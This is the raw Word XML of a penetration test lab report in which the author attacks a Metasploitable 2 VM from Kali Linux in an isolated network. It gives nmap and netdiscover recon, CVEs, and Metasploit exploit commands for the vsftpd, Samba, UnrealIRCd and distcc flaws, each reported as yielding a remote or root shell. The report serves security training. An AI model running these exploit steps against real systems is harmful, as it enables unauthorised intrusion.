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AB20E18" wp14:textId="654FB165">
      <w:r w:rsidR="75245690">
        <w:rPr/>
        <w:t>nmap -sV -O -p- 192.168.30.105</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="769E3215" wp14:textId="20FB6B35">
      <w:r w:rsidR="75245690">
        <w:rPr/>
        <w:t>search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="4F6A6162" wp14:textId="62514560">
      <w:r w:rsidR="75245690">
        <w:rPr/>
        <w:t>searchsploit vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="62833CBF" wp14:textId="6EB93C21">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="75245690">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="752456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2B3D3A9" wp14:paraId="3CBFEC8D" wp14:textId="733D3AD3">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="752456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search </w:t>
      </w:r>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="75245690">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="415A863F" wp14:textId="59793B57">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="752456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exploit/</w:t>
      </w:r>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="75245690">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="752456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/ftp/vsftpd_234_backdoor </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="175A3645" wp14:textId="0ADBAE8F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="752456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RHOSTS 192.168.30.105 </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="68418DA3" wp14:textId="03FDA951">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="63A8ABB1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22B3D3A9" w:rsidR="75245690">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="3786D7E0" wp14:textId="023CDB1F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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22B3D3A9" wp14:paraId="378A2F95" wp14:textId="1AB5CF1B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Penetration testing is the process of evaluating the security posture of a system by simulating attacks that a malicious actor might attempt. The goal is not only to identify vulnerabilities but also to demonstrate how they can be exploited, and to provide recommendations for remediation.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="24DFA1A8" wp14:textId="5DB83231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this project, I performed a penetration test on the </w:t>
      </w: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Metasploitable 2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virtual machine using </w:t>
      </w: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Kali Linux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 attacker machine. Metasploitable 2 is a deliberately vulnerable virtual machine maintained by Rapid7 and is widely used for training in penetration testing, vulnerability assessment, and ethical hacking.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="37789E28" wp14:textId="329C9BF9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The objective of this assessment is to:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="53C08014" wp14:textId="442CEFE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Identify the vulnerabilities present in the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="6A7254CE" wp14:textId="7E08A8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Exploit them using tools available in Kali Linux (such as Nmap, Netdiscover, and Metasploit Framework).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5AA45CEC" wp14:textId="1BFEFB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Document the exploitation process and outcomes.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="3E116DDC" wp14:textId="580920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Provide mitigation recommendations based on industry best practices.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="50C5127E" wp14:textId="71301FE4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By following a structured methodology, this exercise replicates a real-world penetration test, but in a controlled and ethical lab environment</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="7DEBE1DC" wp14:textId="25C53B6A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Penetration Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="577E62C3" wp14:textId="6608EA39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accordance with industry standards such as </w:t>
      </w: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OSSTMM (Open Source Security Testing Methodology Manual)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NIST SP 800-115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, the penetration testing followed five main phases:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="3175735D" wp14:textId="17E2CAF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Information Gathering (Reconnaissance):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Identify hosts, IP addresses, and running services on the target.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="0BAC9779" wp14:textId="49D86A2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Vulnerability Scanning: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Determine version numbers of services and match them to known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="7F1F70C4" wp14:textId="063C1E9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Exploitation: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Metasploit Framework to exploit the identified vulnerabilities and gain access.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="59638D6E" wp14:textId="31F94B7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Post-Exploitation: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 information from the compromised system to demonstrate impact.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="08D53C86" wp14:textId="08BCCE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Reporting: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Document each step, finding, and recommendation.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="39E1616E" wp14:textId="42030EEB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This methodology ensures systematic coverage and avoids random or unstructured attempts at exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="30FAB7A3" wp14:textId="73E32E51">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="25ABC3EB" wp14:textId="578FBE24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The test was conducted in a virtualized lab environment using VMware Workstation.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="2150D901" wp14:textId="5263E7F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Attacker (Kali Linux):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="4250C59E" wp14:textId="7F1688F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IP Address: </w:t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192.168.30.23</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5F519785" wp14:textId="678BB46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Tools used: </w:t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netdiscover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nmap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msfconsole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searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="178FC769" wp14:textId="1637B1F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(Metasploitable 2):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5940F01A" wp14:textId="524C583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IP Address: </w:t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192.168.30.105</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="7C62AF59" wp14:textId="74E5FAC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Contains deliberately vulnerable services including FTP, Samba, IRC, MySQL, PostgreSQL, and vulnerable web applications.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="10C437FF" wp14:textId="14DFB32A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Both machines were connected in </w:t>
      </w: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Host-only network mode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, ensuring that testing was isolated and no external networks were affected.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="3AF8A162" wp14:textId="2AAF9D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="77BC5A2D" wp14:textId="0E99264B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="60959157" wp14:textId="375704DD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The first step was to discover all live hosts in the network range.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5D31082F" wp14:textId="63310828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Command:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5368C909" wp14:textId="27C2727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netdiscover -r 192.168.30.0/24</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="30AE10CB" wp14:textId="2FC233C0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Result:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="59180EE2" wp14:textId="4412E70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Kali Linux → </w:t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192.168.30.23</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="797A00A9" wp14:textId="77FE53E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Metasploitable 2 → </w:t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192.168.30.105</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="54A3DECB" wp14:textId="50F0D082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This confirmed the target machine’s IP.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="217608DB" wp14:textId="09A5F1F1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Next, I used Nmap to scan the target for all open ports, running services, and OS detection.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="4F4BB9DC" wp14:textId="0391346D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Command:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="1745BC74" wp14:textId="4D5728F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nmap -sV -O -p- 192.168.30.105</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="3625AEE0" wp14:textId="17C06B88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Options explained:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5968F009" wp14:textId="5584855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-sV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Detects version of running services.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="71592662" wp14:textId="7FF586A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-O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Attempts to identify the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="32B8D916" wp14:textId="47BE212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-p-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Scans all 65,535 ports.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="6CA1A547" wp14:textId="229FF4C8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="4CA0BBE2" wp14:textId="74071813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comparing the service versions with public vulnerability databases such as </w:t>
      </w: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CVE (Common Vulnerabilities and Exposures)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Exploit-DB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, and Metasploit Framework, I identified the following known vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="204538CC" wp14:textId="6DF4AA7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vsftpd 2.3.4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Backdoor vulnerability (CVE-2011-2523).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="27C10264" wp14:textId="682A309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Samba 3.0.20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Remote code execution (CVE-2007-2447).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="529184F3" wp14:textId="3D9ADF3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UnrealIRCd 3.2.8.1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Backdoor vulnerability (CVE-2010-2075).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="30654387" wp14:textId="4C28EA3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DistCC Daemon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Remote command execution (CVE-2004-2687).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="27FFAD97" wp14:textId="6B0AF59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Applications (DVWA, Mutillidae, PhpMyAdmin)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SQL injection, XSS, weak authentication.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="45AF806B" wp14:textId="14576EE9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="797A604B" wp14:textId="7FB71AE2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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6.1 FTP – vsftpd 2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="502C1468" wp14:textId="00ECC0F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Vulnerability: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vsftpd 2.3.4 is known to contain a malicious backdoor. If a username ending with </w:t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:)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entered, it spawns a shell on port 6200.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="3BEFF1BF" wp14:textId="09B6F27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CVE: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CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="37817539" wp14:textId="20EB907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Metasploit Module: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exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="0729F8BE" wp14:textId="20755E1A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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="245F7FA6" wp14:textId="6425117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msfconsole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use exploit/unix/ftp/vsftpd_234_backdoor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set RHOSTS 192.168.30.105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set RPORT 21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run</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="6A1F2E3C" wp14:textId="7D34EB2A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Remote shell access obtained.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="6ADA01F0" wp14:textId="2B79ED79"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="30E96824" wp14:textId="185AAE80">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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6.2 Samba 3.0.20 – Usermap Script Exploit</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="1E2227FC" wp14:textId="14FD240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Vulnerability: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flaw in Samba allows remote code execution via crafted usermap scripts.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="32D5286E" wp14:textId="4F7DB18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CVE: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CVE-2007-2447</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="7F11DC91" wp14:textId="404F882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Metasploit Module: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exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5BEEBBF9" wp14:textId="63879FD0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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="550D737F" wp14:textId="30C7534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msfconsole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use exploit/multi/samba/usermap_script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set RHOSTS 192.168.30.105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set RPORT 445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run</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="6BE12C91" wp14:textId="6132335A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Remote shell access as root.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="050D2350" wp14:textId="368B5DA5"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="08DA0E2C" wp14:textId="5A83ED3D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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6.3 UnrealIRCd 3.2.8.1 – Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="530DE469" wp14:textId="18E2627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Vulnerability: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downloaded tarball was modified to include a backdoor that executes commands sent in the IRC “nick” field.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="01A21FF2" wp14:textId="690F5FE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CVE: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CVE-2010-2075</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="67F37E8D" wp14:textId="55544DF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Metasploit Module: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exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="24D905D9" wp14:textId="536D5581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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="744E1EEC" wp14:textId="5E1CF00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msfconsole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use exploit/unix/irc/unreal_ircd_3281_backdoor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set RHOSTS 192.168.30.105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set RPORT 6667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run</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5E03CB3D" wp14:textId="140BBA19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Remote root shell access.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="55542360" wp14:textId="6618C64E"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="6018F6FE" wp14:textId="5EA0515A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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6.4 DistCC Daemon – Remote Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="58A17B95" wp14:textId="2AC0898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Vulnerability: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DistCC allows execution of arbitrary shell commands when not properly secured.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="668AD34B" wp14:textId="30E7629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CVE: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CVE-2004-2687</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="142C6565" wp14:textId="7087CC4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Metasploit Module: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exploit/unix/misc/distcc_exec</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="3165C4B1" wp14:textId="0F86E7EC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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="360CE023" wp14:textId="3068874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msfconsole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use exploit/unix/misc/distcc_exec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set RHOSTS 192.168.30.105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set RPORT 3632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run</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="767ACEF1" wp14:textId="4737344F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Result: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Remote command execution obtained.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="25AD37BE" wp14:textId="70735125"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="0958480A" wp14:textId="6FCBE161">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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6.5 Web Applications (Brief Overview)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="73477BCB" wp14:textId="7767420E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Metasploitable 2 also contains web applications like DVWA, Mutillidae, and PhpMyAdmin, which are vulnerable to:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="4334A7B4" wp14:textId="7560CEB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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="512CA1AA" wp14:textId="6A1A9FA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Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="2EAA913D" wp14:textId="0C947CB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Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="1A359FEE" wp14:textId="355AFB8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Weak default credentials</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="3A382CF6" wp14:textId="4C011375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can be exploited manually or using tools like </w:t>
      </w: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sqlmap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Burp Suite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Metasploit web exploits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71A3E14" wp14:textId="22600C93"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="2C38E76E" wp14:textId="0F8F1384">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="1E2F5FA7" wp14:textId="0FDCA98B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After exploitation, I confirmed system access using:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="56E7BEBD" wp14:textId="52483DE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whoami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>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="3067E39F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="4EEC37D3" wp14:textId="29E65E27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Outputs:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="66C6A1E3" wp14:textId="053C5FC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User: root</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="0115BE2D" wp14:textId="57B45BA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Hostname: metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="1163AD54" wp14:textId="1DFE7B45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This confirmed full system compromise.</w:t>
      </w:r>
    </w:p>
